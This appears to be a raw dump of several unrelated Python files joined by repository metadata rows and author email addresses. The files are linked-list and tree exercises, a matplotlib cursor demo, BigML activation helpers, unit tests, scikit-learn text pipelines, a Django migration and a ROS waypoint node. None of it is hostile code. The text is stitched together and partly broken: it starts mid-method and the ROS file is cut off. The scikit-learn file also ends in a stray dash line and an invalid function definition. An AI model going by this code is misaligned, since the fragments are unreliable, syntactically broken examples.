        """Iteratively splice two sorted lists into one sorted list."""
        if l1 is None:
            return l2
        if l2 is None:
            return l1
        sentinel = ListNode(0)
        tail = sentinel
        while l1 is not None and l2 is not None:
            if l1.val < l2.val:
                tail.next, l1 = l1, l1.next
            else:
                tail.next, l2 = l2, l2.next
            tail = tail.next
        # Exactly one list is exhausted; append the remainder of the other.
        tail.next = l1 if l1 is not None else l2
        return sentinel.next

    def mergeTwoLists2(self, l1, l2):
        """Recursive variant: the smaller head absorbs the merge of the rest."""
        if l1 is None or l2 is None:
            return l1 if l2 is None else l2
        if l1.val < l2.val:
            l1.next = self.mergeTwoLists2(l1.next, l2)
            return l1
        l2.next = self.mergeTwoLists2(l1, l2.next)
        return l2
"hoang2109@gmail.com"
] | hoang2109@gmail.com |
9e3718eabb1635e6485630419714c693a7599cdd | 705c2cf0ae1f38efb2340a056b0e78f89f83ec5e | /security_checks/mplcursors_interactive.py | a5758e070897d880410b40de7b7bbeebf9c67b42 | [] | no_license | Vital-Fernandez/vital_tests | 42fad619841d4b57c5ab419e6f58eef523ff8566 | ee8dbc9c09e433f91e78f9ea16977a9e5a44be6c | refs/heads/master | 2023-09-01T21:27:32.160440 | 2023-08-21T20:51:59 | 2023-08-21T20:51:59 | 235,336,802 | 0 | 1 | null | 2022-10-19T08:52:42 | 2020-01-21T12:24:57 | Python | UTF-8 | Python | false | false | 978 | py | # import numpy as np
# import matplotlib.pyplot as plt
# import mplcursors
#
# x = np.linspace(0, 10, 100)
#
# fig, ax = plt.subplots()
# ax.set_title("Click on a line to display its label")
#
# # Plot a series of lines with increasing slopes.
# for i in range(1, 20):
# ax.plot(x, i * x, label=f"$y = {i}x$")
#
# # Use a Cursor to interactively display the label for a selected line.
# mplcursors.cursor().connect(
# "add", lambda sel: sel.annotation.set_text(sel.artist.get_label()))
#
# plt.show()
import matplotlib.pyplot as plt
import numpy as np
import mplcursors
# 10x4 demo matrix (unused by the currently active plot below).
data = np.outer(range(10), range(1, 5))
fig, ax = plt.subplots()
# lines = ax.plot(data)
# ax.set_title("Click somewhere on a line.\nRight-click to deselect.\n"
#              "Annotations can be dragged.")
# Three scatter points; clicking one shows its label from `labels`.
lines = ax.plot(range(3), range(3), "o")
labels = ["a", "b", "c"]
cursor = mplcursors.cursor(lines)
# On selection, replace the default annotation text with the point's label.
cursor.connect("add", lambda sel: sel.annotation.set_text(labels[sel.index]))
plt.show()
"vital.fernandez@gmail.com"
] | vital.fernandez@gmail.com |
78970072af6b04d0d5817dcb82a22a137e0cf694 | 387400d70932b7b65f0ad0e24cb8290a8ce6ed46 | /August_18/129. Sum Root to Leaf Numbers.py | 01bbb2666f4a9e0dc162a013afb5256eadefec2e | [] | no_license | insigh/Leetcode | 0678fc3074b6294e8369756900fff32c7ce4e311 | 29113d64155b152017fa0a98e6038323d1e8b8eb | refs/heads/master | 2021-01-20T07:51:21.051366 | 2018-09-17T13:33:15 | 2018-09-17T13:33:15 | 90,051,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,269 | py | """
Given a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.
An example is the root-to-leaf path 1->2->3 which represents the number 123.
Find the total sum of all root-to-leaf numbers.
Note: A leaf is a node with no children.
Example:
Input: [1,2,3]
1
/ \
2 3
Output: 25
Explanation:
The root-to-leaf path 1->2 represents the number 12.
The root-to-leaf path 1->3 represents the number 13.
Therefore, sum = 12 + 13 = 25.
"""
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    def sumNumbers(self, root):
        """
        Sum the integers formed by every root-to-leaf digit path.

        :type root: TreeNode
        :rtype: int
        """
        if not root:
            return 0
        self.res = []
        self.dfs(root, '')
        self.res = [int(path) for path in self.res]
        return sum(self.res)

    def dfs(self, node, temp):
        """Collect the digit string of each root-to-leaf path into self.res."""
        path = temp + str(node.val)
        if not node.left and not node.right:
            # Leaf: the accumulated digits form one complete number.
            self.res.append(path)
        else:
            if node.left:
                self.dfs(node.left, path)
            if node.right:
                self.dfs(node.right, path)
| [
"zhangchaojie@ruc.edu.cn"
] | zhangchaojie@ruc.edu.cn |
29d251ed2774013737c30b03ac4211fbb47f0035 | 540789545998547d8f7d2732a8f2e9ffafcb4a93 | /bigml/laminar/math_ops.py | 0c39c5c0d9e95d5ba9041a77e1edcc9838515998 | [
"Apache-2.0"
] | permissive | davidifeoluwa/python | 801453adcc99a4eb0b92ef385ec20fa96f272f64 | b5dc03a4c695144250994261813bf39799a8c325 | refs/heads/master | 2020-03-11T04:01:21.906660 | 2018-04-03T16:26:49 | 2018-04-03T16:26:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,477 | py | # -*- coding: utf-8 -*-
#!/usr/bin/env python
#
# Copyright 2017-2018 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Activation functions and helpers in pure python
"""
import math
from bigml.laminar.constants import LARGE_EXP
def broadcast(fn):
    """Lift `fn` (vector -> vector) so it also accepts a list of vectors."""
    def broadcaster(xs):
        if len(xs) == 0:
            return []
        if isinstance(xs[0], list):
            # A matrix: apply fn to every row.
            return [fn(row) for row in xs]
        return fn(xs)
    return broadcaster
def plus(mat, vec):
    """Add `vec` to every row of `mat`, elementwise."""
    return [[cell + offset for cell, offset in zip(row, vec)] for row in mat]

def minus(mat, vec):
    """Subtract `vec` from every row of `mat`, elementwise."""
    return [[cell - offset for cell, offset in zip(row, vec)] for row in mat]

def times(mat, vec):
    """Multiply every row of `mat` by `vec`, elementwise."""
    return [[cell * factor for cell, factor in zip(row, vec)] for row in mat]

def divide(mat, vec):
    """Divide every row of `mat` by `vec`, elementwise."""
    return [[cell / divisor for cell, divisor in zip(row, vec)] for row in mat]
def dot(mat1, mat2):
    """Return mat1 (n x k) times the transpose of mat2 (m x k): an n x m
    matrix whose [i][j] entry is the inner product of mat1[i] and mat2[j]."""
    return [[sum(a * b for a, b in zip(row1, row2)) for row2 in mat2]
            for row1 in mat1]
def batch_norm(X, mean, stdev, shift, scale):
    """Standardize X with (mean, stdev), then rescale by `scale` and
    translate by `shift` -- the inference form of batch normalization."""
    standardized = divide(minus(X, mean), stdev)
    return plus(times(standardized, scale), shift)
def sigmoid(xs):
    """Numerically stable logistic function, applied elementwise.

    Saturates to 1 (resp. 0) when |x| >= LARGE_EXP so that math.exp
    never overflows.
    """
    def _scalar(x):
        if x > 0:
            if x >= LARGE_EXP:
                return 1
            e = math.exp(x)
            return e / (e + 1)
        if -x >= LARGE_EXP:
            return 0
        return 1 / (1 + math.exp(-x))
    return [_scalar(x) for x in xs]
def softplus(xs):
    """Elementwise log(1 + exp(x)); for x >= LARGE_EXP the result is
    indistinguishable from x, so return x directly to avoid overflow."""
    return [x if x >= LARGE_EXP else math.log(math.exp(x) + 1) for x in xs]
def softmax(xs):
    """Softmax of a vector, with max-subtraction for numerical stability."""
    shift = max(xs)
    exps = [math.exp(x - shift) for x in xs]
    total = sum(exps)
    return [e / total for e in exps]
# Activation functions by name; each is wrapped with `broadcast` so it
# accepts either a single vector or a list of vectors.
ACTIVATORS = {
    'tanh': broadcast(lambda xs: [math.tanh(x) for x in xs]),
    'sigmoid': broadcast(sigmoid),
    'softplus': broadcast(softplus),
    'relu': broadcast(lambda xs: [x if x > 0 else 0 for x in xs]),
    'softmax': broadcast(softmax),
    'identity': broadcast(lambda xs: [float(x) for x in xs])
}
def init_layers(layers):
    """Shallow-copy each layer dict so later mutation can't alter the source."""
    return list(map(dict, layers))
def destandardize(vec, v_mean, v_stdev):
    """Undo z-score standardization for a column vector of predictions."""
    return [[row[0] * v_stdev + v_mean] for row in vec]
def to_width(mat, width):
    """Return `mat` with each row tiled (repeated) or truncated to `width`
    columns."""
    ncols = len(mat[0])
    if width > ncols:
        ntiles = int(math.ceil(width / float(ncols)))
    else:
        ntiles = 1
    return [(row * ntiles)[:width] for row in mat]
def add_residuals(residuals, identities):
    """Elementwise-add the identity input (tiled/truncated to the residual
    width) to `residuals` -- the residual-connection merge."""
    to_add = to_width(identities, len(residuals[0]))
    assert len(to_add[0]) == len(residuals[0])
    return [[res + ident for res, ident in zip(res_row, id_row)]
            for res_row, id_row in zip(residuals, to_add)]
def propagate(x_in, layers):
    """Forward-propagate input rows `x_in` through `layers`.

    Each layer dict supplies 'weights', 'mean'/'stdev' (batch-norm params,
    may be None), 'offset', 'scale', 'activation_function' and 'residuals'.
    Residual layers also update the identity stream fed to later layers.
    """
    last_X = identities = x_in
    for layer in layers:
        weights = layer['weights']
        mean, stdev = layer['mean'], layer['stdev']
        offset, scale = layer['offset'], layer['scale']
        afn = layer['activation_function']

        weighted = dot(last_X, weights)
        if mean is not None and stdev is not None:
            next_in = batch_norm(weighted, mean, stdev, offset, scale)
        else:
            next_in = plus(weighted, offset)

        if layer['residuals']:
            next_in = add_residuals(next_in, identities)
            last_X = ACTIVATORS[afn](next_in)
            identities = last_X
        else:
            last_X = ACTIVATORS[afn](next_in)
    return last_X
def sum_and_normalize(youts, is_regression):
    """Combine per-model outputs `youts` (list of prediction matrices).

    Regression: average the single output column across models.
    Classification: sum per class across models, then renormalize each
    row to a probability distribution.
    """
    ysums = []
    for i, row in enumerate(youts[0]):
        ysums.append([sum(yout[i][j] for yout in youts)
                      for j in range(len(row))])
    if is_regression:
        return [[ysum[0] / len(youts)] for ysum in ysums]
    out_dist = []
    for ysum in ysums:
        rowsum = sum(ysum)
        out_dist.append([y / rowsum for y in ysum])
    return out_dist
| [
"merce@bigml.com"
] | merce@bigml.com |
76d9ff4eb111325342e02d42d3862b6329453016 | 06919b9fd117fce042375fbd51d7de6bb9ae14fc | /py/tests/problems/linkedlist/loop_detect_test.py | 0120bef7fddaf215a3f2ca32b984123bbf69953c | [
"MIT"
] | permissive | bmoretz/Daily-Coding-Problem | 0caf2465579e81996869ee3d2c13c9ad5f87aa8f | f79e062e9f6e7b18b7e95c071fbe71ad104affcb | refs/heads/master | 2022-12-07T15:41:06.498049 | 2021-11-18T19:45:19 | 2021-11-18T19:45:19 | 226,376,236 | 1 | 0 | MIT | 2022-11-22T09:20:23 | 2019-12-06T17:17:00 | C++ | UTF-8 | Python | false | false | 1,243 | py | import unittest
from dcp.problems.linkedlist.node import build_ref_list
from dcp.problems.linkedlist.loop_detect import detect_loop1
class Test_DetectLoop1(unittest.TestCase):
    """Tests for detect_loop1 on lists of the form A->B->C->D->E."""

    @staticmethod
    def set_loop(node, loop_back):
        """Link the list's tail back to the node whose data == loop_back."""
        loop_node, prev = None, None
        while node is not None:
            if node.data == loop_back:
                loop_node = node
            prev = node
            node = node.next
        prev.next = loop_node

    def setUp(self):
        pass

    def _assert_loop_detected_at(self, loop_back):
        # Shared body for the positive cases below (previously three
        # copy-pasted test bodies).
        node = build_ref_list(['A', 'B', 'C', 'D', 'E'])
        self.set_loop(node, loop_back)
        self.assertEqual(detect_loop1(node).data, loop_back)

    def test_case1(self):
        # An empty list contains no loop.
        self.assertIsNone(detect_loop1(None))

    def test_case2(self):
        self._assert_loop_detected_at('C')

    def test_case3(self):
        self._assert_loop_detected_at('A')

    def test_case4(self):
        self._assert_loop_detected_at('D')
"bmoretz@ionicsolutions.net"
] | bmoretz@ionicsolutions.net |
37803d71ba2811fec39a1deeee753f4bdc6deb73 | 4a869982cc4cc99d83df18465f545e51c97aeb37 | /.history/Baseline/ma-course-subjectivity-mining/pynlp/ml_pipeline/pipelines_20201015124127.py | 40b408e13f354ddad6524fd6ce7574e836258622 | [] | no_license | SorenKF/emotional_sm | 09d367421782d8c83987fb99be258b1b30c4ce8d | 63d51103f7511b19a83dec668327fcc7ea4a7f39 | refs/heads/main | 2023-02-03T14:12:14.572581 | 2023-01-24T18:06:52 | 2023-01-24T18:06:52 | 301,679,032 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,492 | py | from sklearn.pipeline import Pipeline, FeatureUnion
from ml_pipeline import preprocessing, representation
from sklearn.naive_bayes import MultinomialNB
from sklearn import svm
def pipeline(preprocessor, representation, classifier):
    """Chain a preprocessor, a feature representation and a classifier."""
    steps = [('prep', preprocessor),
             ('frm', representation),
             ('clf', classifier)]
    return Pipeline(steps)
def combined_pipeline(prep1, repr1, prep2, repr2, classifier):
    """Union of two preprocessing/representation branches feeding one
    classifier: token features alongside polarity features."""
    token_branch = Pipeline([('prep1', prep1), ('repr1', repr1)])
    polarity_branch = Pipeline([('prep2', prep2), ('repr2', repr2)])
    combined_features = FeatureUnion([
        ('token_features', token_branch),
        ('polarity_features', polarity_branch)])
    return Pipeline([('features', combined_features),
                     ('clf', classifier)])
# ------------- parametrization ---------------------------

def svm_clf_grid_parameters():
    """Example parameters for svm.LinearSVC grid search.

    The preprocessor and formatter can also be parametrized through the
    prefixes 'prep' and 'frm', respectively.
    """
    grid = {
        'clf__class_weight': (None, 'balanced'),
        'clf__dual': (True, False),
        'clf__C': (0.1, 1, 10),
    }
    return grid
# ------------- standard pipelines ---------------------------------

def naive_bayes_counts():
    """Multinomial naive Bayes over raw token counts."""
    prep = preprocessing.std_prep()
    frm = representation.count_vectorizer({'min_df': 1})
    return pipeline(prep, frm, MultinomialNB())

def naive_bayes_tfidf():
    """Multinomial naive Bayes over tf-idf features."""
    prep = preprocessing.std_prep()
    frm = representation.tfidf_vectorizer()
    return pipeline(prep, frm, MultinomialNB())

def svm_libsvc_counts():
    """Linear SVM over raw token counts."""
    prep = preprocessing.std_prep()
    frm = representation.count_vectorizer()
    clf = svm.LinearSVC(max_iter=10000, dual=False, C=0.1)
    return pipeline(prep, frm, clf)

def svm_libsvc_tfidf():
    """Linear SVM over tf-idf features."""
    prep = preprocessing.std_prep()
    frm = representation.tfidf_vectorizer()
    clf = svm.LinearSVC(max_iter=10000, dual=False, C=0.1)
    return pipeline(prep, frm, clf)

def svm_libsvc_embed():
    """Linear SVM over 'wiki-news' text embeddings."""
    prep = preprocessing.std_prep()
    frm = representation.text2embeddings('wiki-news')
    clf = svm.LinearSVC(max_iter=10000, dual=False, C=0.1)
    return pipeline(prep, frm, clf)

def svm_sigmoid_embed():
    """Sigmoid-kernel SVM over 'glove' text embeddings."""
    prep = preprocessing.std_prep()
    frm = representation.text2embeddings('glove')
    clf = svm.SVC(kernel='sigmoid', gamma='scale')
    return pipeline(prep, frm, clf)
# ---------------- emotional_sm pipelines -----------------------------
# ----- BASELINE ---------------
# SVM with character 4-grams
# Ver 1 - using chargrams inside word boundaries.
# def svm_libsvc_char_4gram():
# return pipeline(preprocessing.std_prep(), representation.count_vectorizer({'analyzer': 'char_wb', 'ngram_range':(4,4)}), svm.LinearSVC(max_iter=10000,
# dual=False, C=0.1))
# Ver 2 - using indescriminate char-4-grams.
def svm_libsvc_char_4gram():
    """Linear SVM over indiscriminate character 4-grams (Ver 2)."""
    features = representation.count_vectorizer({'analyzer': 'char', 'ngram_range': (4, 4)})
    clf = svm.LinearSVC(max_iter=10000, dual=False, C=0.1)
    return pipeline(preprocessing.std_prep(), features, clf)
---------------
# Deepmoji embedding pipeline )hopefully=
def deepmoji_embed:
return pipeline(preprocessing.std_prep(), representation) | [
"s.k.f.fomsgaard@student.vu.nl"
] | s.k.f.fomsgaard@student.vu.nl |
24f069fc6d342348dc51bae9ba831ef54d23aa2d | 516d8b09391fcf6f1dd95fb665a617c4982af55d | /contact/migrations/0014_remove_contactuserpayam4_tarikhjavab.py | c50800d70842dbbe09b104e763f1bc2e8dfe3c43 | [] | no_license | rezmehp/abasian-peroject | 33eb357fbef3591b9cdd7d5a73fb2c90b62fb7a7 | 5c09a4d235719933f10688454066962dae13f3f5 | refs/heads/master | 2023-04-06T21:17:12.855048 | 2021-04-13T15:16:23 | 2021-04-13T15:16:23 | 235,763,509 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | # Generated by Django 3.0.2 on 2020-03-30 15:45
from django.db import migrations
class Migration(migrations.Migration):
    # Drops the ``tarikhjavab`` field from the ``contactuserpayam4`` model.
    # Must run after migration 0013_auto_20200330_2013 of the ``contact`` app.
    dependencies = [
        ('contact', '0013_auto_20200330_2013'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='contactuserpayam4',
            name='tarikhjavab',
        ),
    ]
| [
"rezmehproject@gmail.com"
] | rezmehproject@gmail.com |
da1ab05092eedc735b9105d87a269a3ce7b359e0 | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /rQkriLJBc9CbfRbJb_20.py | dda0425632ec74faa830b48d2c71f225b037b0bf | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py |
def index_of_caps(word):
liste = []
for i, j in enumerate(word):
if j.isupper() == True:
liste.append(i)
return liste
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
7827d8a029673449b0405f45876d99fbc56ab1ee | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_9/brdlia004/question2.py | f51e12c327875c64f8d15a6444ade3e2a4b02e7c | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 960 | py | """File reformatter"""
#Liam Brodie
#BRDLIA004
#11 May 2014
print("Enter the input filename:")
infile = input("")
# Read the whole input file into a list of lines.
in_file = open(infile, "r")
lines = in_file.readlines()
in_file.close()

print("Enter the output filename:")
outfile = input("")
# Fix: int() instead of eval() — eval on raw user input can execute
# arbitrary code and accepts non-numeric expressions.
linelength = int(input("Enter line width:\n"))

# Flatten the file into one long string with the newline characters removed.
newS = ""
for line in lines:
    if line[-1] == "\n":
        newS += line[:len(line) - 1]
    else:
        newS += line
print(newS)


def newline(text):
    """Recursively re-wrap *text* so that each output line is at most
    `linelength` characters, breaking at the last space that fits."""
    if len(text) == 0:
        return ""
    if text[:2] != '\n':
        space = text[:linelength].rfind(" ")
        if space > 0:
            return text[:space] + "\n" + str(newline(text[space + 1:]))
        else:
            # No space within the limit: skip ahead two characters.
            # NOTE(review): kept from the original; this silently drops text
            # when a single word is longer than the requested line width.
            return newline(text[2:])
    # Mirrors the original's implicit None when text starts with '\n'.


output = open(outfile, "w")
outtext = newline(newS)
# Bug fix: the original computed the wrapped text but then wrote the
# unwrapped string (newS). Write the wrapped result instead.
output.write(outtext if outtext is not None else "")
output.close()
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
0d62ec6728b2d8109f68cc7705ee9fca73ad2cf3 | f6bdc0fa18bdf9c02417b7665eaec0a32f536df2 | /tj2_romi_ros/tj2_romi_waypoints/src/tj2_romi_waypoints_node.py | 75c099188a441cba5634730093fc119252492a18 | [] | no_license | frc-88/FRC-Romi-ROS | c677114a78a5a737ba49120d7a54e320525aa130 | 14506bab796c3ea62cd86310678fcd998507729b | refs/heads/main | 2023-03-29T20:28:14.000042 | 2021-04-03T18:42:39 | 2021-04-03T18:42:39 | 337,286,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,631 | py | #!/usr/bin/env python3
import os
import yaml
import math
from collections import OrderedDict
import rospy
import actionlib
import tf2_ros
import tf_conversions
import tf2_geometry_msgs
from tf.transformations import euler_from_quaternion, quaternion_from_euler
import geometry_msgs
from std_msgs.msg import ColorRGBA
from std_srvs.srv import Trigger, TriggerResponse
from visualization_msgs.msg import MarkerArray
from visualization_msgs.msg import Marker
from tj2_romi_waypoints.srv import GetAllWaypoints, GetAllWaypointsResponse
from tj2_romi_waypoints.srv import GetWaypoint, GetWaypointResponse
from tj2_romi_waypoints.srv import DeleteWaypoint, DeleteWaypointResponse
from tj2_romi_waypoints.srv import SavePose, SavePoseResponse
from tj2_romi_waypoints.srv import SaveRobotPose, SaveRobotPoseResponse
from tj2_romi_waypoints.msg import FollowPathAction, FollowPathGoal, FollowPathResult
from state_machine import WaypointStateMachine
class TJ2RomiWaypoints:
    """ROS node that stores named waypoints (x, y, yaw) in a YAML file,
    publishes RViz markers for them, and exposes save/get/delete services
    plus a FollowPath action that drives through a list of waypoint names."""
    def __init__(self):
        self.node_name = "tj2_romi_waypoints"
        rospy.init_node(
            self.node_name
            # disable_signals=True
            # log_level=rospy.DEBUG
        )
        waypoints_path_param = rospy.get_param("~waypoints_path", "~/.ros/waypoints.yaml")
        waypoints_path_param = os.path.expanduser(waypoints_path_param)
        self.map_frame = rospy.get_param("~map", "map")
        self.base_frame = rospy.get_param("~base_link", "base_link")
        self.marker_size = rospy.get_param("~marker_size", 0.25)
        self.marker_color = rospy.get_param("~marker_color", (0.0, 0.0, 1.0, 1.0))
        # marker_color must be a 4-element RGBA sequence
        assert (type(self.marker_color) == tuple or type(self.marker_color) == list), "type(%s) != tuple or list" % type(self.marker_color)
        assert len(self.marker_color) == 4, "len(%s) != 4" % len(self.marker_color)
        self.waypoints_path = self.process_path(waypoints_path_param)
        # waypoint_config maps name -> [x, y, theta]; marker_poses maps name -> PoseStamped
        self.waypoint_config = OrderedDict()
        self.markers = MarkerArray()
        self.marker_poses = OrderedDict()
        self.load_from_path()  # load waypoints
        self.tf_buffer = tf2_ros.Buffer()
        self.tf_listener = tf2_ros.TransformListener(self.tf_buffer)
        self.state_machine = WaypointStateMachine()
        self.marker_pub = rospy.Publisher("waypoint_markers", MarkerArray, queue_size=25)
        self.reload_waypoints_srv = self.create_service("reload_waypoints", Trigger, self.reload_waypoints_callback)
        self.get_all_waypoints_srv = self.create_service("get_all_waypoints", GetAllWaypoints, self.get_all_waypoints_callback)
        self.get_waypoint_srv = self.create_service("get_waypoint", GetWaypoint, self.get_waypoint_callback)
        self.delete_waypoint_srv = self.create_service("delete_waypoint", DeleteWaypoint, self.delete_waypoint_callback)
        self.save_pose_srv = self.create_service("save_pose", SavePose, self.save_pose_callback)
        self.save_robot_pose_srv = self.create_service("save_robot_pose", SaveRobotPose, self.save_robot_pose_callback)
        self.follow_path_server = actionlib.SimpleActionServer("follow_path", FollowPathAction, self.follow_path_callback, auto_start=False)
        self.follow_path_server.start()
    # ---
    # Action callback
    # ---
    def follow_path_callback(self, goal):
        """Resolve each requested waypoint name into a PoseStamped and hand
        the list to the state machine for execution."""
        waypoints = []
        for name in goal.waypoints:
            if not self.check_name(name):
                # NOTE(review): message text reads "is registered" but this
                # branch fires when the name is NOT registered.
                rospy.logwarn("Waypoint name '%s' is registered. Skipping" % name)
                continue
            waypoint = self.get_waypoint(name)
            pose = self.waypoint_to_pose(waypoint)
            waypoints.append(pose)
        self.state_machine.execute(waypoints, self.follow_path_server)
    # ---
    # Service callbacks
    # ---
    def get_all_waypoints_callback(self, req):
        """Return all stored waypoints as a PoseArray plus their names."""
        waypoints = self.get_all_waypoints()
        names = self.get_all_names()
        pose_array = self.waypoints_to_pose_array(waypoints)
        return GetAllWaypointsResponse(pose_array, names)
    def get_waypoint_callback(self, req):
        # Returning a bare False signals service failure for an unknown name.
        if not self.check_name(req.name):
            return False
        waypoint = self.get_waypoint(req.name)
        pose = self.waypoint_to_pose(waypoint)
        return GetWaypointResponse(pose)
    def delete_waypoint_callback(self, req):
        if not self.check_name(req.name):
            return False
        success = self.pop_waypoint(req.name)
        return DeleteWaypointResponse(success)
    def save_pose_callback(self, req):
        """Save a caller-supplied PoseStamped under req.name."""
        success = self.save_from_pose(req.name, req.waypoint)
        return SavePoseResponse(success)
    def save_robot_pose_callback(self, req):
        """Save the robot's current map-frame pose under req.name."""
        success = self.save_from_current(req.name)
        return SaveRobotPoseResponse(success)
    def reload_waypoints_callback(self, req):
        # Re-read the YAML file from disk; message carries the file path.
        if self.load_from_path():
            return TriggerResponse(True, self.waypoints_path)
        else:
            return TriggerResponse(False, self.waypoints_path)
    # ---
    # Service creation macros
    # ---
    def create_service(self, name, srv_type, callback):
        """Advertise a service namespaced under this node and remember its
        full name as an attribute ``<name>_service_name``."""
        name = self.node_name + "/" + name
        service_name = name + "_service_name"
        self.__dict__[service_name] = name
        rospy.loginfo("Setting up service %s" % name)
        srv_obj = rospy.Service(name, srv_type, callback)
        rospy.loginfo("%s service is ready" % name)
        return srv_obj
    def listen_for_service(self, name, srv_type):
        """Create a ServiceProxy for an external service (blocking helper)."""
        service_name = name + "_service_name"
        self.__dict__[service_name] = name
        rospy.loginfo("Waiting for service %s" % name)
        srv_obj = rospy.ServiceProxy(name, srv_type)
        rospy.loginfo("%s service is ready" % name)
        return srv_obj
    # ---
    # File manipulations
    # ---
    def load_from_path(self):
        """Load the YAML waypoint file into waypoint_config and rebuild the
        marker cache. Returns False if the file is missing or unreadable."""
        if not self.initialize_file():
            return False
        try:
            with open(self.waypoints_path) as file:
                config = yaml.safe_load(file)
            if config is None:
                # empty file -> empty config
                self.waypoint_config = OrderedDict()
            else:
                self.waypoint_config = config
            self.all_waypoints_to_markers()
            return True
        except BaseException as e:
            rospy.logwarn("Failed to load waypoints file '%s'. %s" % (self.waypoints_path, e))
            return False
    def initialize_file(self):
        # If file doesn't exist, create directories and empty file
        if os.path.isfile(self.waypoints_path):
            return True
        waypoints_dir = os.path.dirname(self.waypoints_path)
        if not os.path.isdir(waypoints_dir):
            os.makedirs(waypoints_dir)
        with open(self.waypoints_path, 'w') as file:
            file.write("")
        rospy.logwarn("Waypoints file '%s' doesn't exist. Creating file." % self.waypoints_path)
        return False
    def process_path(self, waypoints_path):
        """Normalize a waypoints path: default directory to ~/.ros and force
        a .yaml extension."""
        map_name = os.path.basename(waypoints_path)
        waypoints_dir = os.path.dirname(waypoints_path)
        if len(waypoints_dir) == 0:
            waypoints_dir = os.path.expanduser("~/.ros")
        waypoints_name = os.path.splitext(map_name)[0]
        waypoints_name += ".yaml"
        waypoints_path = os.path.join(waypoints_dir, waypoints_name)
        return waypoints_path
    def save_to_path(self):
        """Write waypoint_config back to disk; returns success flag."""
        try:
            with open(self.waypoints_path, 'w') as file:
                for name, waypoint in self.waypoint_config.items():
                    yaml.safe_dump({name: waypoint}, file)
            return True
        except BaseException as e:
            rospy.logwarn("Failed to save waypoints file '%s'. %s" % (self.waypoints_path, e))
            return False
    # ---
    # Node methods
    # ---
    def check_name(self, name):
        """Return True when *name* is a known waypoint, repairing a missing
        marker entry as a side effect."""
        if name not in self.waypoint_config:
            return False
        if name not in self.marker_poses:
            rospy.logwarn("Waypoint name %s was added, but wasn't a registered marker! Adding." % name)
            pose = self.waypoint_to_pose(self.get_waypoint(name))
            self.add_marker(name, pose)
        return True
    def save_from_pose(self, name, pose):
        # name: str, name of waypoint
        # pose: geometry_msgs.msg.PoseStamped
        # returns: bool, whether the file was successfully written to
        self.waypoint_config[name] = self.pose_to_waypoint(pose)
        self.add_marker(name, pose)
        return self.save_to_path()
    def save_from_current(self, name):
        # name: str, name of waypoint
        # returns: bool, whether the file was successfully written to and whether the tf lookup was successful
        try:
            current_tf = self.tf_buffer.lookup_transform(self.map_frame, self.base_frame, rospy.Time(0), rospy.Duration(1.0))
        except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException) as e:
            rospy.logwarn("Failed to look up %s to %s. %s" % (self.map_frame, self.base_frame, e))
            return False
        pose = geometry_msgs.msg.PoseStamped()
        pose.header.frame_id = self.map_frame
        pose.pose.position = current_tf.transform.translation
        pose.pose.orientation = current_tf.transform.rotation
        return self.save_from_pose(name, pose)
    def save_from_object(self, name):
        # name: str, name of waypoint
        # NOTE(review): unimplemented stub; always reports failure.
        return False
    def get_waypoint(self, name):
        # name: str, name of waypoint
        # returns: list, [x, y, theta]
        return self.waypoint_config[name]
    def pop_waypoint(self, name):
        # name: str, name of waypoint
        # returns: bool, result of save_to_path() after the removal
        self.delete_marker(name)
        self.waypoint_config.pop(name)
        return self.save_to_path()
    def get_all_waypoints(self):
        # returns: list, [[x, y, theta], ...]
        return [waypoint for waypoint in self.waypoint_config.values()]
    def get_all_names(self):
        # returns: list, [str, ...] waypoint names
        return [name for name in self.waypoint_config.keys()]
    # ---
    # Conversion methods
    # ---
    def pose_to_waypoint(self, pose):
        # pose: geometry_msgs.msg.PoseStamped
        # returns: list, [x, y, theta]
        yaw = euler_from_quaternion([
            pose.pose.orientation.x,
            pose.pose.orientation.y,
            pose.pose.orientation.z,
            pose.pose.orientation.w,
        ])[2]
        return [pose.pose.position.x, pose.pose.position.y, yaw]
    def waypoint_to_pose(self, waypoint):
        # waypoint: list, [x, y, theta]
        # returns: geometry_msgs.msg.PoseStamped
        quat = quaternion_from_euler(0.0, 0.0, waypoint[2])
        pose = geometry_msgs.msg.PoseStamped()
        pose.header.frame_id = self.map_frame
        pose.pose.position.x = waypoint[0]
        pose.pose.position.y = waypoint[1]
        pose.pose.orientation.x = quat[0]
        pose.pose.orientation.y = quat[1]
        pose.pose.orientation.z = quat[2]
        pose.pose.orientation.w = quat[3]
        return pose
    def waypoints_to_pose_array(self, waypoints):
        # waypoint: list, [[x, y, theta], ...]
        # returns: geometry_msgs.msg.PoseArray
        pose_array = geometry_msgs.msg.PoseArray()
        pose_array.header.frame_id = self.map_frame
